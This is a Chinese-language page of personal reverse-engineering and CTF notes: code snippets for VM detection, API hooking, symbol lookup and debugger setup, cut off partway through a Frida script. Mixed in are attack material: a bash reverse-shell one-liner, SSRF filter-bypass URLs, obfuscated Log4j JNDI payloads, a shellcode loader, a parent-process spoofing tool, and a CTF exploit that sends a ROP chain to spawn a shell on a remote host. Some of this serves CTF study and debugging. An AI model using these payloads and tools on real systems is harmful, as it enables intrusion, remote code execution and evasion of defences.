目录
- cheakvm
- MinHook
- 隐藏console窗口
- gcc编译Object-C
- MacOS编译通用二进制文件
- pwnlldb
- lldb intel汇编
- Loader ShellCode
- 伪造父进程
- QiLing Demo
- 打开Win10内核远程调试
- SSRF Bypass
- 获取导出函数地址
- OpenProcess Error 5
- 获取程序所有符号
- sa-jdi.jar
- Log4j
- 半透明窗口
- C#
- runc启动一个容器
- 反弹shell
- 启用Windows Dump功能
- Linux内联汇编
- 自定义base64
- Linux更新内核后VM虚拟机不可用
- A* search
- Frida
- LKM Makefile
- Linux Hook
- linux对apk签名
- Linux 编译libc.so
- 字符串画图片
- 攻防世界
- Python base64替换密码表
- babystack
- CTF-wiki
- 常用URL
- upload
- vmliux
- python&&C混合编程
- qmeu
- IDA_IDC脚本
- python处理文件
- i春秋_break
- 看雪_流浪者
- i春秋_loading
- XDCTF_pwn01
- sha1加密
- 2017湖湘杯_pwn300
- 西湖论剑_story
- i春秋_breakingbad
- i春秋_3.7Z
- x计划_littlenotebook
- Asis CTF 2016 b00ks
- WhaleCTF_逆向练习
- *ctf_quick
cheakvm
BOOL cheakvm(){
int cpu_info[4];
__cpuid(cpu_info, 1);
printf("%08X-%08X-%08X-%08X\n", cpu_info[0], cpu_info[1], cpu_info[2], cpu_info[3]);
bool is_found = false;
if ((cpu_info[2] >> 31) & 1)
{
// hypervisor found
is_found = true;
// check Hyper-V root partition
cpu_info[1] = 0;
cpu_info[2] = 0;
cpu_info[3] = 0;
__cpuid(cpu_info, 0x40000000);
printf("%08X-%08X-%08X-%08X\n", cpu_info[0], cpu_info[1], cpu_info[2], cpu_info[3]);
if (cpu_info[1] == 0x7263694d && cpu_info[2] == 0x666f736f && cpu_info[3] == 0x76482074)
{ // "Microsoft Hv"
cpu_info[1] = 0;
__cpuid(cpu_info, 0x40000003);
printf("%08X-%08X-%08X-%08X\n", cpu_info[0], cpu_info[1], cpu_info[2], cpu_info[3]);
if (cpu_info[1] & 1)
is_found = false;
}
if (is_found){
printf("VM Find!\n");
}else{
printf("Not VM!\n");
}
}else{
printf("Not VM!\n");
}
return is_found;
}
MinHook
模板:
#include <iostream>
#include <Windows.h>
#include <MinHook.h>
typedef LPVOID(__stdcall* PFN_VirtualAlloc)(
LPVOID lpAddress,
SIZE_T dwSize,
DWORD flAllocationType,
DWORD flProtect
);
PFN_VirtualAlloc g_VirtualAlloc = NULL;
PFN_VirtualAlloc g_Real_VirtualAlloc = NULL;
LPVOID Hook_VirtualAlloc(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType,DWORD flProtect) {
LPVOID ret = NULL;
printf("dwSize: 0x%x flAllocationType: 0x%x flProtect: 0x%x\n", dwSize, flAllocationType, flProtect);
//if (flProtect == PAGE_EXECUTE_READWRITE) {
// flProtect = PAGE_READWRITE;
//}
if (g_Real_VirtualAlloc) {
ret = g_Real_VirtualAlloc(lpAddress, dwSize, flAllocationType, flProtect);
printf("VirtualAlloc Address: 0x%p\n\n", ret);
}
return ret;
}
int main()
{
BOOL bRet = MH_Initialize();;
HMODULE hNtdll = GetModuleHandle(L"kernelbase.dll");
printf("hNtdll: %lx\n", hNtdll);
g_VirtualAlloc = (PFN_VirtualAlloc)GetProcAddress(hNtdll, "VirtualAlloc");
if (g_VirtualAlloc) {
printf("pVirtualAlloc: %lx\n", g_VirtualAlloc);
MH_CreateHook(g_VirtualAlloc, Hook_VirtualAlloc, (LPVOID*)&g_Real_VirtualAlloc);
MH_EnableHook(g_VirtualAlloc);
}
unsigned char *address = (unsigned char *)VirtualAlloc(NULL, 1024, MEM_COMMIT, PAGE_READWRITE);
//getchar();
//HANDLE hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)address, NULL, 0, NULL);
system("pause");
//WaitForSingleObject(hThread, INFINITE);
return 0;
}
隐藏console窗口
VS等编译器可以直接在源码中添加:
#pragma comment(linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"")
对于g++, gcc等命令行编译可以添加编译参数:
-Wl,-subsystem,windows
或者
-Wl,-entry,mainCRTStartup
参考: https://github.com/xmake-io/xmake/issues/10
gcc编译Object-C
// exp.mm
#import <Foundation/Foundation.h>
int main (int argc, const char * argv[]){
@autoreleasepool{
NSLog(@"Sir");
}
return 0;
}
gcc命令行:
gcc -framework Foundation exp.mm -o exp
MacOS编译通用二进制文件
// 编译x64架构文件
gcc --target=x86_64-apple-darwin21 ./test.cpp -o ./x64
// 编译arm架构文件
gcc --target=aarch64-apple-darwin21 ./test.cpp -o ./aarch64
// 合为通用二进制文件("胖"二进制文件)
lipo -create -output fat ./aarch64 ./x64
pwnlldb
lldb的简化版pwndbg:
# vim ~/.lldbinit
command script import ~/pwnlldb.py
from typing import Dict
import lldb
from functools import wraps
OUTPUT_REGISTERS = [
'rax',
'rbx',
'rcx',
'rdx',
'rsi',
'rsi',
'rdi',
'rbp',
'rsp',
'rip'
]
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKCYAN = '\033[96m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
# https://gist.github.com/stek29/cdbbbe018f0aaf0b2a9a58c9173becb8
RFLAGS = [
['CF', 'Carry Flag', 'carry'],
[None, 'Reserved', None],
['PF', 'Parity Flag', 'parity'],
[None, 'Reserved', None],
['AF', 'Adjust Flag', 'adjust'],
[None, 'Reserved', None],
['ZF', 'Zero Flag', 'zero'],
['SF', 'Sign Flag', 'sign'],
['TF', 'Trap Flag', 'trap'],
['IF', 'Interrupt Enable Flag', 'interrupt'],
['DF', 'Direction Flag', 'direction'],
['OF', 'Overflow Flag', 'overflow'],
['IOPL_H', 'I/O privilege level High bit', 'IOPL_H'],
['IOPL_L', 'I/O privilege level Low bit', 'IOPL_L'],
['NT', 'Nested Task Flag', 'nested'],
[None, 'Reserved', None],
# eflags
['RF', 'Resume Flag', 'resume'],
['VM', 'Virtual 8086 mode flag', 'VM'],
['AC', 'Alignment check', 'alignement'],
['VIF', 'Virtual interrupt flag', 'virtual interrpt'],
['VIP', 'Virtual interrupt pending', 'VIP'],
['ID', 'Able to use CPUID instruction', 'ID'],
# 22-31 reserved
# rflags 32-63 reserved
]
def ParseRflags(val):
""" Returns list of set flags """
rflags = list()
for bit, desc in enumerate(RFLAGS):
shortname, name, output = desc
if val & (1 << bit) and name != 'Reserved':
rflags.append(output)
return rflags
def FormatOutput(func):
@wraps(func)
def wrapper(*args, **kwargs):
print(f"{bcolors.OKBLUE}[{func.__name__.center(60, '-')}]{bcolors.ENDC}")
results = func(*args, **kwargs)
print(f"{bcolors.OKBLUE}[{'-'*60}]{bcolors.ENDC}")
return results
return wrapper
@FormatOutput
def Registers(debugger, command, result, internal_dict):
target = debugger.GetSelectedTarget()
process = target.GetProcess()
mainThread = process.GetThreadAtIndex(0)
currentFrame = mainThread.GetSelectedFrame()
registerList = currentFrame.GetRegisters()
generalPurposeRegister = registerList[0]
for registers in registerList:
for register in registers:
regName = register.GetName()
if regName in OUTPUT_REGISTERS:
print(f"{bcolors.OKGREEN}{regName}{bcolors.ENDC}: {register.GetValue()}")
elif regName == 'rflags':
regValue = int(register.GetValue(), 0)
rflags = ParseRflags(regValue)
colorizeFlagsOutput = [f"{bcolors.OKGREEN}{flag}" if index % 2 else f"{bcolors.FAIL}{flag.upper()}" for index, flag in enumerate(rflags)]
print(f"{bcolors.OKGREEN}rflags {bcolors.ENDC}: {register.GetValue()}({' | '.join(colorizeFlagsOutput)}{bcolors.ENDC})")
@FormatOutput
def Code(debugger, command, result, internal_dict):
cur_pc = debugger.GetSelectedTarget().GetProcess().GetSelectedThread().GetSelectedFrame().GetPC()
debugger.HandleCommand('disassemble --start-address=' + str(cur_pc) + ' -c 16')
@FormatOutput
def Stack(debugger, command, result, internal_dict):
cur_sp = debugger.GetSelectedTarget().GetProcess().GetSelectedThread().GetSelectedFrame().GetSP()
debugger.HandleCommand('x/12gx ' + str(cur_sp))
class StopHook:
def __init__(self, target: lldb.SBTarget, extra_args: lldb.SBStructuredData, _dict: Dict):
print("Pwnlldb StopHook init")
def handle_stop(self, exe_ctx: lldb.SBExecutionContext, stream: lldb.SBStream):
# print(f"SP={exe_ctx.frame.sp:#x}")
Registers(lldb.debugger, "", "", "")
Stack(lldb.debugger, "", "", "")
def __lldb_init_module(debugger: lldb.SBDebugger, internal_dict):
debugger.HandleCommand("target stop-hook add -P pwnlldb.StopHook")
debugger.HandleCommand('command script add -f pwnlldb.Code code')
参考:
- https://github.com/ryaoi/lldb-peda/blob/master/reverse.py
- https://github.com/ant4g0nist/lisa.py/blob/dev/lisa.py
- https://lldb.llvm.org/use/python-reference.html
lldb intel汇编
lldb 设置反汇编风格为 intel
// vim ~/.lldbinit
setting set target.x86-disassembly-flavor intel
Loader ShellCode
方便调试Shellcode:
#include <windows.h>
#include <stdio.h>
LPVOID LoadFileIntoMemory( LPSTR Path, PDWORD MemorySize ) {
PVOID ImageBuffer = NULL;
DWORD dwBytesRead = 0;
HANDLE hFile = NULL;
hFile = CreateFileA( Path, GENERIC_READ, 0, 0, OPEN_ALWAYS, 0, 0 );
if (hFile == INVALID_HANDLE_VALUE)
{
printf( "Error opening %s\r\n", Path );
return NULL;
}
if ( MemorySize )
*MemorySize = GetFileSize( hFile, 0 );
ImageBuffer = ( PBYTE ) LocalAlloc( LPTR, *MemorySize );
ReadFile( hFile, ImageBuffer, *MemorySize, &dwBytesRead, 0 );
CloseHandle( hFile );
return ImageBuffer;
}
typedef void ( * ShellcodeMain )();
int main( int argc, char** argv )
{
PVOID ShellcodeBytes = NULL;
DWORD ShellcodeSize = 0;
DWORD OldProtection = 0;
LPVOID ShellcodeMemory = NULL;
if ( argc < 2 )
{
printf( "[-] %s <shellcode path>\n", argv[ 0 ] );
return 0;
}
ShellcodeBytes = LoadFileIntoMemory( argv[ 1 ], &ShellcodeSize );
ShellcodeMemory = VirtualAlloc( NULL, ShellcodeSize, MEM_COMMIT, PAGE_READWRITE );
if ( ! ShellcodeMemory )
{
printf("[-] Failed to allocate Virtual Memory\n");
return 0;
}
printf( "[*] Address => %p\n", ShellcodeMemory );
memcpy( ShellcodeMemory, ShellcodeBytes, ShellcodeSize );
VirtualProtect(ShellcodeMemory, ShellcodeSize, PAGE_EXECUTE_READWRITE, &OldProtection);
puts("[+] Execute shellcode... press enter");
getchar();
((ShellcodeMain)ShellcodeMemory)();
}
伪造父进程
#define _CRT_SECURE_NO_WARNINGS
#include <windows.h>
#include <TlHelp32.h>
#include <iostream>
int wmain(int argc, wchar_t **argv)
{
STARTUPINFOEXW si;
PROCESS_INFORMATION pi;
SIZE_T attributeSize;
int targetPid = -1;
int cnt = 1;
wchar_t defaultCmdline[] = L"notepad.exe";
wchar_t* cmdline = defaultCmdline;
while ((argc > 1) && (argv[cnt][0] == '-'))
{
switch (argv[cnt][1])
{
case 'p':
++cnt;
--argc;
targetPid = _wtoi(argv[cnt]);
break;
case 'c':
++cnt;
--argc;
cmdline = argv[cnt];
printf("cmdline: %S\n", cmdline);
break;
default:
printf("Wrong Argument: %S\n", argv[cnt]);
printf("%S -p pid\n", argv[0]);
exit(-1);
}
++cnt;
--argc;
}
HANDLE parentProcessHandle = OpenProcess(MAXIMUM_ALLOWED, FALSE, targetPid);
if (parentProcessHandle) {
InitializeProcThreadAttributeList(NULL, 1, 0, &attributeSize);
ZeroMemory(&si, sizeof(STARTUPINFOEXA));
si.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), 0, attributeSize);
InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &attributeSize);
UpdateProcThreadAttribute(si.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &parentProcessHandle, sizeof(HANDLE), NULL, NULL);
si.StartupInfo.cb = sizeof(STARTUPINFOEXA);
//si.StartupInfo.lpDesktop = (LPWSTR)L"winsta0\\default";
if (!CreateProcessW(NULL, (LPWSTR)cmdline, NULL, NULL, FALSE, EXTENDED_STARTUPINFO_PRESENT, NULL, NULL, &si.StartupInfo, &pi)) {
printf("Error Code: 0x%x\n", GetLastError());
}
}
return 0;
}
参考: https://github.com/antonioCoco/MalSeclogon/tree/master
QiLing Demo
from qiling import *
from qiling.const import QL_VERBOSE
from pwnlib.util.packing import p64
src = b""
def set_key_scr(ql: Qiling):
ql.mem.write(0x1000, b"\x12\x00\x00\x00\x34\x00\x00\x00\x56\x00\x00\x00\x78\x00\x00\x00") # key
ql.mem.write(0x1010, src)
ql.arch.regs.rdx = 0x1000
ql.arch.regs.rcx = 0x1010
print("ql_rcx: " + hex(ql.arch.regs.rcx))
print("ql_rdx: " + hex(ql.arch.regs.rdx))
def get_result(ql: Qiling):
key = ql.mem.read(0x1000, 0x10)
print("key: ", end="")
for key_i in key:
print(hex(key_i), end=" ")
result = ql.mem.read(0x1010, 8)
print("\nresult: ", end="")
for result_i in result:
print(hex(result_i), end=" ")
print("")
path = ['QiLing\\examples\\rootfs\\x8664_windows\\bin\\easy.exe']
rootfs = "QiLing\\examples\\rootfs\\x8664_windows\\"
ql = Qiling(path, rootfs, verbose=QL_VERBOSE.DISABLED)
ql.mem.map(0x1000, 0x1000, info='[key]')
ql.hook_address(set_key_scr, 0x140011A40)
ql.hook_address(get_result, 0x140011B91)
for src_i in range(0x10000000, 0x10000005):
print("src_i: " + hex(src_i))
src = p64(src_i)
ql.run(begin=0x140011A40, end=0x140011B92)
打开Win10内核远程调试
bcdedit /debug on
bcdedit /dbgsettings net hostip:w.x.y.z port:n
w.x.y.z为远程调试机器的IP, n是需要的调试端口
SSRF Bypass
http://0.0.0.0
http://0
http://0x7f000001
http://2130706433
http://0000::1
http://0000::1:25
http://0000::1:22
http://0000::1:3128
http://2130706433
http://3232235521
http://3232235777
http://2852039166
http://0o177.0.0.1
获取导出函数地址
MZ头->PE头->导出表->遍历->比较Name->获得NameOrdinals->取Functions,得到函数在内存中基地址的偏移量:
// #include <psapi.h>
HMODULE _base_addr = LoadLibrary(<DllName>);
PIMAGE_DOS_HEADER pdh = (PIMAGE_DOS_HEADER)_base_addr;
PIMAGE_NT_HEADERS pnt = (PIMAGE_NT_HEADERS)(_base_addr + pdh->e_lfanew);
PIMAGE_EXPORT_DIRECTORY pexports = (PIMAGE_EXPORT_DIRECTORY)(_base_addr +
pnt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
PDWORD _Functions = (PDWORD)(_base_addr + pexports->AddressOfFunctions);
PDWORD _Name = (PDWORD)(_base_addr + pexports->AddressOfNames);
PDWORD _NameOrdinals = (PWORD)(_base_addr + pexports->AddressOfNameOrdinals);
for (DWORD i = 0; i < pexports->NumberOfNames; i++) {
if (!strcmp(_base_addr + _Name[i], <FunctionName>)) {
HMODULE _addr = _base_addr + _Function[_NameOrdinals[i]];
break;
}
}
IMAGE_DOS_HEADER dosheader;
IMAGE_OPTIONAL_HEADER64 opthdr; // 解析64位PE
// IMAGE_OPTIONAL_HEADER32 opthdr; // 解析32位PE
IMAGE_EXPORT_DIRECTORY exports;
ReadProcessMemory(VMhandle, BaseAddress, &dosheader, sizeof(IMAGE_DOS_HEADER), 0);
ReadProcessMemory(VMhandle, (BYTE *)BaseAddress + dosheader.e_lfanew + 24, &opthdr, sizeof(IMAGE_OPTIONAL_HEADER64), 0);
// ReadProcessMemory(VMhandle, (BYTE *)BaseAddress + dosheader.e_lfanew + 24, &opthdr, sizeof(IMAGE_OPTIONAL_HEADER32), 0);
//EXPORT Table
ReadProcessMemory(VMhandle, ((BYTE *)BaseAddress + opthdr.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress), &exports, sizeof(IMAGE_EXPORT_DIRECTORY), 0);
PULONG pAddressOfFunctions = (ULONG *)((BYTE *)BaseAddress + exports.AddressOfFunctions);
PULONG pAddressOfNames = (ULONG *)((BYTE *)BaseAddress + exports.AddressOfNames);
PUSHORT pAddressOfNameOrdinals = (USHORT *)((BYTE *)BaseAddress + exports.AddressOfNameOrdinals);
//SymbolName
ULONG addr;
char pFuncName[64] = {0};
int index = 0;
for (int i = 0; i < exports.NumberOfNames; i++)
{
ReadProcessMemory(VMhandle, pAddressOfNameOrdinals + i, &index, sizeof(USHORT), 0);
ReadProcessMemory(VMhandle, pAddressOfFunctions + index, &addr, sizeof(ULONG), 0);
ULONG offset = 0;
ReadProcessMemory(VMhandle, pAddressOfNames + i, &offset, sizeof(ULONG), 0);
ReadProcessMemory(VMhandle, (BYTE *)BaseAddress + offset, pFuncName, sizeof(pFuncName), 0);
printf("0x%p %s \n",addr + BaseAddress, pFuncName);
}
OpenProcess Error 5
OpenProcess()
获取进程句柄返回错误码5(Access is denied.
), 这个进程可能是一个服务启动的, 需要提权, 将权限设置为SE_PRIVILEGE_ENABLED
:
int pid = 1234;
VMhandle = OpenProcess(PROCESS_VM_READ, FALSE, pid);
if(VMhandle <= 0){
// printf("OpenProcess Error: %ld\n", GetLastError());
HANDLE hToken;
BOOL fOk=FALSE;
if(OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken)){
TOKEN_PRIVILEGES tp;
tp.PrivilegeCount=1;
LookupPrivilegeValue(NULL,SE_DEBUG_NAME,&tp.Privileges[0].Luid);
tp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(hToken,FALSE,&tp,sizeof(tp),NULL,NULL);
fOk=(GetLastError()==ERROR_SUCCESS);
CloseHandle(hToken);
}
if(fOk){
VMhandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
}
}
获取程序所有符号
#include <windows.h>
#include <stdio.h>
#include <dbghelp.h>
#pragma comment(lib, "dbghelp.lib")
BOOL CALLBACK EnumSymProc(
PSYMBOL_INFO pSymInfo,
ULONG SymbolSize,
PVOID UserContext)
{
printf("%08X %4u %s\n",
pSymInfo->Address, SymbolSize, pSymInfo->Name);
return TRUE;
}
int main(){
DWORD64 BaseOfDll = 0L;
char *Mask = "*!*";
SymInitialize(VMhandle, NULL, TRUE);
if (SymEnumSymbols(VMhandle, BaseOfDll, Mask, EnumSymProc, NULL))
{
// SymEnumSymbols succeeded
}
else
{
// SymEnumSymbols failed
printf("SymEnumSymbols failed: %d\n", GetLastError());
}
SymCleanup(VMhandle);
return 0;
}
获取指定符号:
#include <windows.h>
#include <stdio.h>
#include <dbghelp.h>
#pragma comment(lib, "dbghelp.lib")
ULONG64 lookupInProcess(char *SymbolName) {
ULONG64 SymbolAddr = 0;
ULONG64 buffer[(sizeof(SYMBOL_INFO) +
MAX_SYM_NAME * sizeof(TCHAR) +
sizeof(ULONG64) - 1) /
sizeof(ULONG64)];
PSYMBOL_INFO pSymbol = (PSYMBOL_INFO) buffer;
pSymbol->SizeOfStruct = sizeof(SYMBOL_INFO);
pSymbol->MaxNameLen = MAX_SYM_NAME;
SymInitialize(VMhandle, NULL, TRUE);
if (SymFromName(VMhandle, SymbolName, pSymbol)) {
SymbolAddr = pSymbol->Address;
} else {
DWORD error = GetLastError();
printf("SymFromName returned error : %lu\n", error);
}
SymCleanup(VMhandle);
return SymbolAddr;
}
int main(){
ULONG64 addr = lookupInProcess("lookupInProcess");
printf("addr:%p\n", addr);
return 0;
}
sa-jdi.jar
# 命令行版本
java -cp "%JAVA_HOME%/lib/sa-jdi.jar" sun.jvm.hotspot.CLHSDB
# 图形界面版本
java -cp "%JAVA_HOME%/lib/sa-jdi.jar" sun.jvm.hotspot.HSDB
# Javascript引擎版本
java -cp "%JAVA_HOME%/lib/sa-jdi.jar" sun.jvm.hotspot.tools.soql.JSDB
Log4j
${jndi:ldap://127.0.0.1:1389/Exploit}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
${jndi:rmi://adsasd.asdasd.asdasd}
${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}
半透明窗口
#include <Windows.h>
#include <stdio.h>
int main() {
POINT curpos;
HWND handle = NULL;
int mb_ok;
LONG Wlong;
while(1)
{
if(GetAsyncKeyState(VK_LBUTTON) & 0x8000){
GetCursorPos(&curpos);
handle = WindowFromPoint(curpos);
printf("0x%x\n", handle);
Wlong = GetWindowLongW(handle, GWL_EXSTYLE);
SetWindowLong(handle, GWL_EXSTYLE, Wlong | 0x80000);
SetLayeredWindowAttributes(handle, 0, 225, LWA_ALPHA);
mb_ok = MessageBoxA(NULL, "Is it necessary to change?", "Sir", MB_OKCANCEL);
if(mb_ok != IDOK){
SetWindowLong(handle, GWL_EXSTYLE, Wlong);
}
break;
}
}
return 0;
}
C#
dotnet new console --output sample1
dotnet run --project sample1
runc启动一个容器
将一个docker image文件解压,然后打包成tar:
docker run --rm -d --name ubuntu ubuntu:18.04 tail -f /dev/null
docker export ubuntu > rootfs.tar
docker kill ubuntu
将tar文件解压后制作成容器所需的Filesystem bundle, 然后用·runc spec·命令获得设置文件(config.json):
mkdir -p bundle/rootfs
tar xf rootfs.tar -C bundle/rootfs
runc spec -b bundle
运行runc run,Filesystem bundle作为参数,启动容器:
runc run --bundle bundle demo1
反弹shell
bash -c 'bash -i >& /dev/tcp/192.168.56.104/1234 0>&1'
启用Windows Dump功能
OpenDump.bat
@echo off
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\LocalDumps"
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\LocalDumps" /v DumpFolder /t REG_EXPAND_SZ /d "C:\CrashDump" /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\LocalDumps" /v DumpType /t REG_DWORD /d 2 /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\LocalDumps" /v DumpCount /t REG_DWORD /d 10 /f
pause
@echo on
Linux内联汇编
unsigned long int uid = 0;
__asm__("mov %%fs:0x0,%%rdi\n\t"
"mov 0x28(%%rdi),%%rdx\n\t"
: "=d"(uid) // outputs
: // inputs
: // registers-modified);
限定符 | 意义 |
---|---|
“m”、”v”、”o” | 内存单元 |
“r” | 任何寄存器 |
“q” | 寄存器 eax、ebx、ecx、edx 之一 |
“i”、”h” | 直接操作数 |
“E”和”F” | 浮点数 |
“g” | 任意 |
“a”、”b”、”c”、”d” | 分别表示寄存器 eax、ebx、ecx 和 edx |
“S”和”D” | 寄存器 esi、edi |
“I” | 常数(0 至 31) |
自定义base64
# 自定义字典
base64_list = "abcdefghijklMNOPQRSTUVWXYZABCDEFGHIJKLmnopqrstuvwxyz0123456789+/"
def base64Encode(string):
oldBin = ""
tempStr = []
result = ""
# 一共要八位不够补零 得到2进制值的字符串流
for ch in string:
# print(ch)
# print("{:08}".format(int(str(bin(ord(ch))).replace("0b", ""))))
oldBin += "{:08}".format(int(str(bin(ord(ch))).replace("0b", "")))
# 通过切片将每6位合并得到的字符串放在列表中 {:<06}左对齐 不够补零 主要是为了最后不够6位
for i in range(0, len(oldBin), 6):
tempStr.append("{:<06}".format(oldBin[i:i + 6]))
# print(tempStr)
# 每六位 换成十进制 索引到b64列表
for item in tempStr:
result = result + base64_list[int(item, 2)]
# 假如结果不是4的倍数 用等号补齐
if len(result) % 4 == 2:
result += "=="
elif len(result) % 4 == 3:
result += "="
return result
def base64Decode(string):
result = []
string = string.strip("=")
binstr = ""
bin6list = []
bin8list = []
# 还原出6位二进制列表
for ch in string:
bin6list.append("{:>06}".format(str(bin(base64_list.index(ch)).replace("0b", ""))))
# 还原出到2进制值的字符串流
binstr = "".join(bin6list)
# 还原出到8位2进制值的字符串列表
for i in range(0, len(binstr), 8):
bin8list.append(binstr[i:i + 8])
# 根据ascall值得出原字符 最后一个item全是多余的0
for item in range(len(bin8list) - 1):
result.append(chr(int(bin8list[item], 2)))
return "".join(result)
data = "aaaaaaaaaaaaaaaaaaaaaaaaaaaa"
print(base64Encode(data[::-1]))
print(base64Decode("ZmxHZ3teMf95MfVFS24xD19fBmNyWXa3AW9uFQ=="))
Linux更新内核后VM虚拟机不可用
修复脚本:
#!/bin/bash
VMWARE_VERSION=workstation-15.5.6
TMP_FOLDER=/tmp/patch-vmware
rm -fdr $TMP_FOLDER
mkdir -p $TMP_FOLDER
cd $TMP_FOLDER
git clone https://github.com/mkubecek/vmware-host-modules.git
cd $TMP_FOLDER/vmware-host-modules
git checkout $VMWARE_VERSION
git fetch
make
sudo make install
sudo rm /usr/lib/vmware/lib/libz.so.1/libz.so.1
sudo ln -s /lib/x86_64-linux-gnu/libz.so.1 /usr/lib/vmware/lib/libz.so.1/libz.so.1
sudo /etc/init.d/vmware restart
VMWARE_VERSION
查看方式:
vmware-installer -l
A* search
from ptrlib import *
import heapq
class Maze(object):
MAZE_OBJ = [" ", "#", "F", "?"]
def __init__(self, maze, px, py, step=0, move=""):
self.px = px
self.py = py
self.maze = maze
self.step = step
self.move = move
for i, l in enumerate(self.maze):
for j, c in enumerate(l):
if c == 2:
self.fx, self.fy = j, i
def h(self):
return abs(self.px - self.fx) + abs(self.py - self.fy)
def f(self):
return self.step + self.h()
def goal(self):
return (self.px, self.py) == (self.fx, self.fy)
def gen_next(self):
candidate = []
if self.maze[self.py][self.px-1] in [0, 2]:
candidate.append(
Maze(self.maze, self.px-1, self.py, self.step+1, self.move+"a")
)
if self.maze[self.py][self.px+1] in [0, 2]:
candidate.append(
Maze(self.maze, self.px+1, self.py, self.step+1, self.move+"d")
)
if self.maze[self.py-1][self.px] in [0, 2]:
candidate.append(
Maze(self.maze, self.px, self.py-1, self.step+1, self.move+"w")
)
if self.maze[self.py+1][self.px] in [0, 2]:
candidate.append(
Maze(self.maze, self.px, self.py+1, self.step+1, self.move+"s")
)
return candidate
def __lt__(self, other):
return self.f() < other.f()
def __str__(self):
output = ''
for i, l in enumerate(self.maze):
for j, c in enumerate(l):
if (j, i) == (self.px, self.py):
output += 'P'
else:
output += self.MAZE_OBJ[c]
output += '\n'
return output.strip()
def __hash__(self):
return hash((self.px, self.py))
class MazeRobot(object):
def __init__(self, maze, px, py):
self.initial_map = Maze(maze, px, py)
def solve(self):
queue = []
visited = []
heapq.heappush(queue, self.initial_map)
while len(queue) > 0:
maze = heapq.heappop(queue)
if hash(maze) in visited:
continue
else:
visited.append(hash(maze))
if maze.goal():
break
for next_maze in maze.gen_next():
heapq.heappush(queue, next_maze)
return maze.move
def __str__(self):
return str(self.initial_map)
def solve_level():
r = sock.recvline()
level = int(r[r.index(b"is level ") + 9:])
logger.info("Solving level {}".format(level))
# Load field
maze = []
px, py = -1, -1
buf = b''
for height in range(5 + level):
maze.append([])
l = sock.recvline()
#print(l.decode())
i = 0
while i < len(l):
c = -1
block = l[i:i+3]
if block == b'\xe2\xac\x9b':
c = 1
elif block == b'\xe2\xac\x9c':
c = 0
elif block == b'\xf0\x9f\x9a':
c = 2
i += 1
else:
px, py = len(maze[-1]), len(maze) - 1
i += 1
i += 3
maze[-1].append(c)
# Solve
robot = MazeRobot(maze, px, py)
move = robot.solve()
return move
#"""
#sock = Socket("localhost", 9999)
sock = Socket("170.106.35.18", 62176)
for i in range(100):
move = solve_level()
sock.sendline(move)
print(move)
#"""
#sock = Socket("localhost", 9999)
#sock = Process("./pwn.packed")
# leak proc base
payload = b'A' * (14 * 8)
payload += p64(0xc00003dd20)
payload += p64(0x40) * 2
payload += b'A' * (17 * 8)
payload += b'\xce'
sock.sendlineafter("name:\n", payload)
r = sock.recvregex("is : (.+)\.")
print(r)
proc_base = u64(r[0][:8]) - 0x1192eb
logger.info("proc = " + hex(proc_base))
if proc_base < 0:
logger.warn("Bad luck!")
exit(1)
# get the shell
rop_syscall = proc_base + 0x000cfe79
rop_pop_rdi = proc_base + 0x00109d3d
rop_pop_rax = proc_base + 0x00074e29
rop_pop_rsi_r15 = proc_base + 0x00119c45
rop_pop_rdx_adc_al_f6 = proc_base + 0x00079e6e
payload = b'A' * (15 * 8)
payload += p64(0x0) * 2
payload += b'A' * (16 * 8)
payload += b'/bin/sh\0'
payload += p64(rop_pop_rdx_adc_al_f6)
payload += p64(0)
payload += p64(rop_pop_rdi)
payload += p64(0xc00003de80)
payload += p64(rop_pop_rsi_r15)
payload += p64(0)
payload += p64(0xdeadbeef)
payload += p64(rop_pop_rax)
payload += p64(59)
payload += p64(rop_syscall)
sock.sendlineafter("name:\n", payload)
sock.interactive()
Frida
from pwn import *
import frida
import sys
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh', '-c']
system_addr = ""
proc_addr = ""
def PrintMessage(message,data):
if(message["type"] == "send"):
global system_addr
global proc_addr
if("system" in message["payload"]):
system_addr = message["payload"][-14::]
if("pro_addr" in message["payload"]):
proc_addr = message["payload"][-14::]
print("[*] var {0}".format(message["payload"]))
elif(message['type'] == 'error'):
for i in message:
if(i == 'type'):
print('[*] %s' % 'error:')
continue
if(type(message[i]) is str):
print('[*] %s' % i + ':\n\t{0}'.format(message[i].replace(' ', ' ')))
else:
print('[*] %s' % i + ':\n\t{0}'.format(message[i]))
else:
print(message)
jscode = '''
var pro_addr = Module.findBaseAddress('re');
send("pro_addr: " + pro_addr);
var exports = Module.enumerateExportsSync("/lib/x86_64-linux-gnu/libc.so.6");
